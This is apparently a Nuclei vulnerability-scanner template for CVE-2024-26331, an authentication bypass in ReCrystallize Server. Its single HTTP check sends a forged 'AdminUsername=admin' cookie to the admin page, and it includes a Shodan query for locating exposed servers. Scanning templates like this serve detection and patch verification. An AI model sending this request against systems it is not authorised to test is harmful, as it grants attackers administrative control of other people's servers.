id: CVE-2024-26331

info:
  name: ReCrystallize Server - Authentication Bypass
  author: Carson Chan
  severity: high
  description: |
    This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed.
  reference:
    - https://preview.sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/
    - https://sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/
    - https://www.recrystallize.com/merchant/ReCrystallize-Server-for-Crystal-Reports.htm
    - https://github.com/Ostorlab/KEV
  classification:
    epss-score: 0.00053
    epss-percentile: 0.21091
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"ReCrystallize"
  tags: cve,recrystallize,auth-bypass,cve2024

http:
  - method: GET
    path:
      - "{{BaseURL}}/Admin/Admin.aspx"
    headers:
      Cookie: "AdminUsername=admin"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "ReCrystallize Server Administration"
          - "License Status:"
          - "System Info</a>"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e928c7859193006cd99c90b731a3b18dd0d240bac2e82924b37dd22c175ed5d60221009515071390aee6618749c0b8f77c3a61ce42adc081cd9e7a3b1ccdfd5eb629b3:922c64590222798bb761d5b6d8e72950